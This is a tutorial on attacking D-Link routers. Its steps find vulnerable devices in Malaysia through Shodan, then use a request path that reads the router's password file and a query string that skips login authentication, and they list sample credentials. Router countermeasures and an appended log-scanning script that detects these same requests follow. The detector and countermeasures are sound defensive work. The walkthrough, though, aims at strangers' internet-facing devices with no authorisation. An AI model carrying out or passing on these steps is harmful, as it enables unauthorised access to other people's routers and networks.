Remote D-Link Router Attack

Shodan is a search engine that lets the user find specific types of computers (routers, servers, webcams, etc.) connected to the internet using a variety of filters.


1. In this tutorial, we will use a vulnerability in D-Link router firmware to run a directory traversal attack. For more information, please check this CVE.


2. First, browse to www.shodan.io to explore all the online devices.


3. Register and log in to a Shodan account to unlock the advanced search features.


4. Search for online vulnerable modem router models by using this parameter: Mathopd/1.5p6 country:MY
You may also search for the other vulnerable versions mentioned in the CVE, such as Mathopd 1.4.x and 1.5.x before 1.5p7. In this case, we target Malaysia.


5. Select any router and proceed to the login page.


6. Now, enter the path below to access the router's login credential file. Credit goes to Keith Rozario.
/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
E.g.: http://<IP address>:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd



7. You will now see the login credentials shown in plain text. Next, you may use the login ID and password to access the router.

Login ID = Management
Password = TestingR2

8. Alternatively, you can bypass the login authentication entirely by using this path.
/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
E.g.: http://<IP address>:8080/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0

Keys to Success
  • The modem router runs a vulnerable version mentioned in the CVE.
  • To be exploited online, the target router must have remote access enabled.
  • The password file must be located at the expected path, which is /var/etc/httpasswd.

Countermeasures
  1. Turn off the router's remote access feature if you are not using it.
  2. Update to the latest available firmware.
  3. Contact your service provider if you are unsure how to apply these countermeasures.
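
To complement the countermeasures above, here is a detection check that scans HTTP access logs for the two request patterns from steps 6 and 8. It is an added example, not code from the original tutorial or from the vendor; the combined log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client IP, request target and status from a combined-format log line (assumed format).
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(target):
    """Return the names of the rules a request target trips (empty list if none)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # parse_qs percent-decodes values; names are upper-cased so matching is broad.
    params = {k.upper(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    rules = []
    for value in params.get("REQUIRE_FILE", []):
        value = unquote(value)  # second decode catches double-encoded values
        if path.endswith("/__show_info.php") and (value.startswith("/") or ".." in value):
            rules.append("require_file_path_read")
            break
    if "NO_NEED_AUTH" in params:
        rules.append("auth_override_param")
    return rules

def scan(lines):
    """Return (client_ip, status, target, rules) for every suspicious log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        rules = classify(m.group(2))
        if rules:
            findings.append((m.group(1), int(m.group(3)), m.group(2), rules))
    return findings

# Constructed sample lines using documentation IP ranges, not captured traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd HTTP/1.1" 200 87',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, status, target, rules in scan(SAMPLE):
        print(ip, status, ",".join(rules), target)
```
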
References: www.keithrozario.com